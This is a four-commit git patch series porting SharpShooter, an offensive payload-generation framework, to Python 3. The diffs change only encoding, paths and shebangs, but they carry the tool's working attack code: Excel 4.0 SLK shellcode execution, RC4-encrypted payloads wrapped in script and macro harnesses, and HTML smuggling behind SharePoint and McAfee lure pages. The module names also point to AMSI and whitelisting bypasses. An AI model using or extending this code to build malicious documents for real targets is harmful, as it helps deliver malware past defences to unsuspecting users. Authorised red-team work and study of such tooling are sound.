From bd4c22e8d2cebccb22dbf5ee88921164ea60c595 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Daniel=20Ruiz=20de=20Alegr=C3=ADa?= Date: Wed, 20 Mar 2024 13:51:30 +0100 Subject: [PATCH 1/4] Fix indentation error --- modules/excel4.py | 46 +++++++++++++++++++++++----------------------- 1 file changed, 23 insertions(+), 23 deletions(-) diff --git a/modules/excel4.py b/modules/excel4.py index 7982917..5f954fb 100644 --- a/modules/excel4.py +++ b/modules/excel4.py @@ -6,7 +6,7 @@ # http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen def bytes2int(str): - return int(str.encode('hex'), 16) + return int(str.encode('hex'), 16) SHELLCODE_HEADER = """ID;P O;E @@ -25,28 +25,28 @@ def bytes2int(str): """ def generate_slk(shellcode_path): - return build_shellcode_slk(shellcode_path) + return build_shellcode_slk(shellcode_path) def build_shellcode_slk(shellcode_path): - #print("[*] Building shellcode exec SLK") + #print("[*] Building shellcode exec SLK") - slk_output = SHELLCODE_HEADER - with open(shellcode_path, "rb") as f: - byte = f.read(1) - i = 0 - cell=0 - while byte != "": - if i == 0: - cell=cell+1 - slk_output+=("C;X2;Y%s;K0;E" % (str(cell))) - else: - slk_output+=("&") - slk_output+=("CHAR(" + str(bytes2int(byte)) + ")") - byte = f.read(1) - i+=1 - if i == 20: - slk_output+=("\n") - i = 0 - cell=cell+1 - slk_output+=("\nC;X2;Y%s;K0;ERETURN()\nE\n" % (str(cell))) - return slk_output \ No newline at end of file + slk_output = SHELLCODE_HEADER + with open(shellcode_path, "rb") as f: + byte = f.read(1) + i = 0 + cell=0 + while byte != "": + if i == 0: + cell=cell+1 + slk_output+=("C;X2;Y%s;K0;E" % (str(cell))) + else: + slk_output+=("&") + slk_output+=("CHAR(" + str(bytes2int(byte)) + ")") + byte = f.read(1) + i+=1 + if i == 20: + slk_output+=("\n") + i = 0 + cell=cell+1 + slk_output+=("\nC;X2;Y%s;K0;ERETURN()\nE\n" % (str(cell))) + return slk_output From d29df60ecf1655c1d0f872f4c72bfa9d295009c4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Daniel=20Ruiz=20de=20Alegr=C3=ADa?= Date: Wed, 20 Mar 2024 13:52:20 +0100 Subject: [PATCH 2/4] Fixes for python3 --- SharpShooter.py | 44 ++++++++++++++++++++++-------------------- modules/embedinhtml.py | 20 +++++++++---------- modules/excel4.py | 4 ++-- 3 files changed, 35 insertions(+), 33 deletions(-) diff --git a/SharpShooter.py b/SharpShooter.py index 9b10de1..1c13fe6 100644 --- a/SharpShooter.py +++ b/SharpShooter.py @@ -17,6 +17,7 @@ import string import sys import argparse +import traceback from jsmin import jsmin from modules import * @@ -162,12 +163,12 @@ def validate_args(self): return args def read_file(self, f): - with open(f, 'r') as fs: + with open(f, 'rb') as fs: content = fs.read() return content def rand_key(self, n): - return ''.join([random.choice(string.lowercase) for i in xrange(n)]) + return ''.join([random.choice(string.ascii_lowercase) for i in range(n)]) def gzip_str(self, string_): fgz = BytesIO() @@ -182,7 +183,7 @@ def gzip_str(self, string_): return fgz def rc4(self, key, data): - S = range(256) + S = list(range(256)) j = 0 out = [] @@ -201,7 +202,7 @@ def rc4(self, key, data): def run(self, args): - template_body = "" + template_body = b"" template_base = "templates/sharpshooter." shellcode_delivery = False shellcode_gzip = "" @@ -401,6 +402,7 @@ def run(self, args): except Exception as e: print("\n\033[1;31m[!]\033[0;0m Incorrect choice") + template_body = template_body.decode(encoding='utf-8') template_code = template_body.replace("%SANDBOX_ESCAPES%", sandbox_techniques) delivery_method = "1" @@ -432,9 +434,9 @@ def run(self, args): sc = self.read_file(args.shellcode_file) shellcode.append(sc) - shellcode = "\n".join(shellcode) + shellcode = b"\n".join(shellcode) - shellcode_final = shellcode_template.replace("%SHELLCODE%", shellcode) + shellcode_final = shellcode_template.replace(b"%SHELLCODE%", shellcode) shellcode_gzip = self.gzip_str(shellcode_final) elif (args.stageless or stageless_payload is True): @@ -444,7 +446,7 @@ def run(self, args): # sc_split = [encoded_sc[i:i+100] for i in range(0, len(encoded_sc), 100)] # for i in sc_split: #else: - template_code = template_code.replace("%SHELLCODE64%", encoded_sc) + template_code = template_code.replace("%SHELLCODE64%", encoded_sc.decode(encoding='utf-8')) else: refs = args.refs @@ -491,8 +493,8 @@ def run(self, args): template_code = template_code.replace("%DELIVERY%", deliverycode) break - except Exception as e: - print(e) + except Exception: + print(traceback.format_exc()) print("\n\033[1;31m[!]\033[0;0m Incorrect choice") sys.exit(-1) @@ -516,36 +518,36 @@ def run(self, args): key = self.rand_key(10) payload_encrypted = self.rc4(key, template_code) - payload_encoded = base64.b64encode(payload_encrypted) + payload_encoded = base64.b64encode(payload_encrypted.encode(encoding='utf-8')) awl_payload_simple = "" if("js" in file_type or args.comtechnique): - harness = self.read_file("templates/harness.js") - payload = harness.replace("%B64PAYLOAD%", payload_encoded) + harness = self.read_file("templates/harness.js").decode(encoding='UTF-8') + payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8')) payload = payload.replace("%KEY%", "'%s'" % (key)) payload_minified = jsmin(payload) awl_payload_simple = template_code elif("wsf" in file_type): - harness = self.read_file("templates/harness.wsf") - payload = harness.replace("%B64PAYLOAD%", payload_encoded) + harness = self.read_file("templates/harness.wsf").decode(encoding='utf-8') + payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8')) payload = payload.replace("%KEY%", "'%s'" % (key)) payload_minified = jsmin(payload) elif("hta" in file_type): - harness = self.read_file("templates/harness.hta") - payload = harness.replace("%B64PAYLOAD%", payload_encoded) + harness = self.read_file("templates/harness.hta").decode(encoding='utf-8') + payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8')) payload = payload.replace("%KEY%", "'%s'" % (key)) payload_minified = jsmin(payload) elif("vba" in file_type): - harness = self.read_file("templates/harness.vba") - payload = harness.replace("%B64PAYLOAD%", payload_encoded) + harness = self.read_file("templates/harness.vba").decode(encoding='utf-8') + payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8')) payload = payload.replace("%KEY%", "\"%s\"" % (key)) payload_minified = jsmin(payload) elif("slk" in file_type): pass else: - harness = self.read_file("templates/harness.vbs") - payload = harness.replace("%B64PAYLOAD%", payload_encoded) + harness = self.read_file("templates/harness.vbs").decode(encoding='utf-8') + payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8')) payload = payload.replace("%KEY%", "\"%s\"" % (key)) if (payload_type == 3): @@ -583,7 +585,7 @@ def run(self, args): outputfile_shellcode = outputfile + ".payload" with open("output/" + outputfile_shellcode, 'w') as f: gzip_encoded = base64.b64encode(shellcode_gzip.getvalue()) - f.write(gzip_encoded) + f.write(gzip_encoded.decode(encoding='utf-8')) f.close() print("\033[1;34m[*]\033[0;0m Written shellcode payload to output/%s" % outputfile_shellcode) diff --git a/modules/embedinhtml.py b/modules/embedinhtml.py index 3c7e794..eb817d7 100644 --- a/modules/embedinhtml.py +++ b/modules/embedinhtml.py @@ -63,7 +63,7 @@ def convertFromTemplate(parameters, templateFile): class RC4: def __init__(self, key=None): - self.state = range(256) # initialisation de la table de permutation + self.state = list(range(256)) # initialisation de la table de permutation self.x = self.y = 0 # les index x et y, au lieu de i et j if key is not None: @@ -72,7 +72,7 @@ def __init__(self, key=None): # Key schedule def init(self, key): - for i in range(256): + for i in list(range(256)): self.x = (ord(key[i % len(key)]) + self.state[i] + self.x) & 0xFF self.state[i], self.state[self.x] = self.state[self.x], self.state[i] self.x = 0 @@ -80,11 +80,11 @@ def init(self, key): # Encrypt binary input data def binaryEncrypt(self, data): output = [None] * len(data) - for i in range(len(data)): + for i in list(range(len(data))): self.x = (self.x + 1) & 0xFF self.y = (self.state[self.x] + self.y) & 0xFF self.state[self.x], self.state[self.y] = self.state[self.y], self.state[self.x] - output[i] = chr((data[i] ^ self.state[(self.state[self.x] + self.state[self.y]) & 0xFF])) + output[i] = chr((ord(data[i]) ^ self.state[(self.state[self.x] + self.state[self.y]) & 0xFF])) return ''.join(output) # Encrypt string input data @@ -93,8 +93,8 @@ def stringEncrypt(self, data): Decrypt/encrypt the passed data using RC4 and the given key. https://github.com/EmpireProject/Empire/blob/73358262acc8ed3c34ffc87fa593655295b81434/data/agent/stagers/dropbox.py """ - S, j, out = range(256), 0, [] - for i in range(256): + S, j, out = list(range(256)), 0, [] + for i in list(range(256)): j = (j + S[i] + ord(self.key[i % len(self.key)])) % 256 S[i], S[j] = S[j], S[i] i = j = 0 @@ -114,7 +114,7 @@ def run_embedInHtml(key, fileName, outFileName, template_name): if key and fileName and outFileName: try: - with open(fileName) as fileHandle: + with open(fileName, 'rb') as fileHandle: fileBytes = bytearray(fileHandle.read()) fileHandle.close() print("\033[1;34m[*]\033[0;0m File [{}] successfully loaded !".format(fileName)) @@ -134,7 +134,7 @@ def run_embedInHtml(key, fileName, outFileName, template_name): print("\033[93m[!]\033[0;0m Could not determine the mime type for the input file. Force it using the -m switch.") quit() - payload = base64.b64encode(rc4Encryptor.binaryEncrypt(fileBytes)) + payload = base64.b64encode(rc4Encryptor.binaryEncrypt(fileBytes.decode(encoding='utf-8')).encode()) print("\033[1;34m[*]\033[0;0m Encrypted input file with key [{}]".format(key)) # blobShim borrowed from https://github.com/mholt/PapaParse/issues/175#issuecomment-75597039 @@ -153,8 +153,8 @@ def run_embedInHtml(key, fileName, outFileName, template_name): varBlobObjectName = rand() varBlob = rand() varBlobShim = rand() - blobShimEncrypted = base64.b64encode(rc4Encryptor.stringEncrypt(blobShim)) - blobObjectNameEncrypted = base64.b64encode(rc4Encryptor.stringEncrypt("Blob")) + blobShimEncrypted = base64.b64encode(rc4Encryptor.stringEncrypt(blobShim).encode()) + blobObjectNameEncrypted = base64.b64encode(rc4Encryptor.stringEncrypt("Blob").encode()) fileName = os.path.basename(fileName) params = { diff --git a/modules/excel4.py b/modules/excel4.py index 5f954fb..daec246 100644 --- a/modules/excel4.py +++ b/modules/excel4.py @@ -5,8 +5,8 @@ # For a breakdown of this technique I recommend watching # http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen -def bytes2int(str): - return int(str.encode('hex'), 16) +def bytes2int(byte): + return int.from_bytes(byte, byteorder='big') SHELLCODE_HEADER = """ID;P O;E From dc8d0fce019e9621debb6a672fcdcfb288303dd4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Daniel=20Ruiz=20de=20Alegr=C3=ADa?= Date: Wed, 20 Mar 2024 13:52:47 +0100 Subject: [PATCH 3/4] Use relative paths --- SharpShooter.py | 31 +++++++++++++++++-------------- modules/embedinhtml.py | 7 ++++--- 2 files changed, 21 insertions(+), 17 deletions(-) diff --git a/SharpShooter.py b/SharpShooter.py index 1c13fe6..0033f71 100644 --- a/SharpShooter.py +++ b/SharpShooter.py @@ -17,6 +17,7 @@ import string import sys import argparse +import os import traceback from jsmin import jsmin from modules import * @@ -204,6 +205,7 @@ def run(self, args): template_body = b"" template_base = "templates/sharpshooter." + source_path = os.path.dirname(os.path.realpath(__file__)) + "/" shellcode_delivery = False shellcode_gzip = "" payload_type = 0 @@ -261,6 +263,7 @@ def run(self, args): template_base = "templates/sharpshooterv4." #print(template_base) + template_base = source_path + template_base if(args.payload == "hta"): payload_type = 1 @@ -427,7 +430,7 @@ def run(self, args): shellcode_payload = shellcode_payload.lower() if (shellcode_payload == "y" or shellcode_payload == "yes"): shellcode_delivery = True - shellcode_template = self.read_file("templates/shellcode.cs") + shellcode_template = self.read_file(source_path + "templates/shellcode.cs") shellcode = [] @@ -523,30 +526,30 @@ def run(self, args): awl_payload_simple = "" if("js" in file_type or args.comtechnique): - harness = self.read_file("templates/harness.js").decode(encoding='UTF-8') + harness = self.read_file(source_path + "templates/harness.js").decode(encoding='UTF-8') payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8')) payload = payload.replace("%KEY%", "'%s'" % (key)) payload_minified = jsmin(payload) awl_payload_simple = template_code elif("wsf" in file_type): - harness = self.read_file("templates/harness.wsf").decode(encoding='utf-8') + harness = self.read_file(source_path + "templates/harness.wsf").decode(encoding='utf-8') payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8')) payload = payload.replace("%KEY%", "'%s'" % (key)) payload_minified = jsmin(payload) elif("hta" in file_type): - harness = self.read_file("templates/harness.hta").decode(encoding='utf-8') + harness = self.read_file(source_path + "templates/harness.hta").decode(encoding='utf-8') payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8')) payload = payload.replace("%KEY%", "'%s'" % (key)) payload_minified = jsmin(payload) elif("vba" in file_type): - harness = self.read_file("templates/harness.vba").decode(encoding='utf-8') + harness = self.read_file(source_path + "templates/harness.vba").decode(encoding='utf-8') payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8')) payload = payload.replace("%KEY%", "\"%s\"" % (key)) payload_minified = jsmin(payload) elif("slk" in file_type): pass else: - harness = self.read_file("templates/harness.vbs").decode(encoding='utf-8') + harness = self.read_file(source_path + "templates/harness.vbs").decode(encoding='utf-8') payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8')) payload = payload.replace("%KEY%", "\"%s\"" % (key)) @@ -555,7 +558,7 @@ def run(self, args): elif (payload_type == 5): file_type = "vbe" - f = open("output/" + outputfile_payload, 'w') + f = open(outputfile_payload, 'w') #print(payload) if(payload_type == 8): f.write(macro_stager) @@ -565,9 +568,9 @@ def run(self, args): if(args.comtechnique): if not args.awltechnique or args.awltechnique == "wmic": - payload_file = "output/" + outputfile + ".xsl" + payload_file = outputfile + ".xsl" else: - payload_file = "output/" + outputfile + ".sct" + payload_file = outputfile + ".sct" #if("js" in file_type or "hta" in file_type or "wsf" in file_type): awl_payload = awl.create_com_stager(args.comtechnique, file_type, args.awlurl, payload_file, awl_payload_simple, args.amsi) @@ -580,22 +583,22 @@ def run(self, args): f.write(payload) f.close() - print("\033[1;34m[*]\033[0;0m Written delivery payload to output/%s" % outputfile_payload) + print("\033[1;34m[*]\033[0;0m Written delivery payload to %s" % outputfile_payload) if shellcode_delivery: outputfile_shellcode = outputfile + ".payload" - with open("output/" + outputfile_shellcode, 'w') as f: + with open(outputfile_shellcode, 'w') as f: gzip_encoded = base64.b64encode(shellcode_gzip.getvalue()) f.write(gzip_encoded.decode(encoding='utf-8')) f.close() - print("\033[1;34m[*]\033[0;0m Written shellcode payload to output/%s" % outputfile_shellcode) + print("\033[1;34m[*]\033[0;0m Written shellcode payload to %s" % outputfile_shellcode) if "vba" not in file_type: if (args.smuggle): key = self.rand_key(10) template = "" template = args.template - embedinhtml.run_embedInHtml(key, "./output/" + outputfile_payload, "./output/" + outputfile + ".html", template) + embedinhtml.run_embedInHtml(key, outputfile_payload, outputfile + ".html", template) if __name__ == "__main__": ss = SharpShooter() args = ss.validate_args() - ss.run(args) \ No newline at end of file + ss.run(args) diff --git a/modules/embedinhtml.py b/modules/embedinhtml.py index eb817d7..a96f0e4 100644 --- a/modules/embedinhtml.py +++ b/modules/embedinhtml.py @@ -188,9 +188,9 @@ def run_embedInHtml(key, fileName, outFileName, template_name): if (template_choice < 1 or template_choice > 6): raise Exception if(template_choice == 1): - templatesource = "./templates/sharepoint.tpl" + templatesource = "templates/sharepoint.tpl" elif(template_choice == 2): - templatesource = "./templates/mcafee.tpl" + templatesource = "templates/mcafee.tpl" break except: print("\033[1;31m[!]\033[0;0m Incorrect choice") @@ -198,8 +198,9 @@ def run_embedInHtml(key, fileName, outFileName, template_name): templatesource = input("\033[1;34m[*]\033[0;0m Provide full path to custom template\n") else: - templatesource = "./templates/%s.tpl" % template_name + templatesource = "templates/%s.tpl" % template_name + templatesource = os.path.dirname(os.path.realpath(__file__)) + '/../' + templatesource resultHTML = convertFromTemplate(params, templatesource) if resultHTML is not None: From 477f34c2bbe9facf687368eccdd4839dbc83da8f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Daniel=20Ruiz=20de=20Alegr=C3=ADa?= Date: Wed, 20 Mar 2024 13:53:03 +0100 Subject: [PATCH 4/4] Use python3 shebang --- SharpShooter.py | 2 +- modules/amsikiller.py | 2 +- modules/awl.py | 2 +- modules/embedinhtml.py | 2 +- modules/excel4.py | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/SharpShooter.py b/SharpShooter.py index 0033f71..a5daaf7 100644 --- a/SharpShooter.py +++ b/SharpShooter.py @@ -1,4 +1,4 @@ -#! /usr/bin/env python +#!/usr/bin/env python3 # -*- coding: utf-8 -*- # diff --git a/modules/amsikiller.py b/modules/amsikiller.py index 5f25b44..2b1124c 100644 --- a/modules/amsikiller.py +++ b/modules/amsikiller.py @@ -1,4 +1,4 @@ -#!/usr/bin/python +#!/usr/bin/env python3 def amsi_stub(file_type, technique, filename): diff --git a/modules/awl.py b/modules/awl.py index 9156758..6da4bb0 100644 --- a/modules/awl.py +++ b/modules/awl.py @@ -1,4 +1,4 @@ -#!/usr/bin/python +#!/usr/bin/env python3 def create_com_stager(technique, filetype, awlurl, outputfile, sspayload, amsi): diff --git a/modules/embedinhtml.py b/modules/embedinhtml.py index a96f0e4..cb555ad 100644 --- a/modules/embedinhtml.py +++ b/modules/embedinhtml.py @@ -1,4 +1,4 @@ -#!/usr/bin/env python +#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # Original Author: Arno0x0x - https://twitter.com/Arno0x0x diff --git a/modules/excel4.py b/modules/excel4.py index daec246..5c99393 100644 --- a/modules/excel4.py +++ b/modules/excel4.py @@ -1,4 +1,4 @@ -#!/usr/bin/python +#!/usr/bin/env python3 import sys # Some of this code is bastardised from code by @StanHacked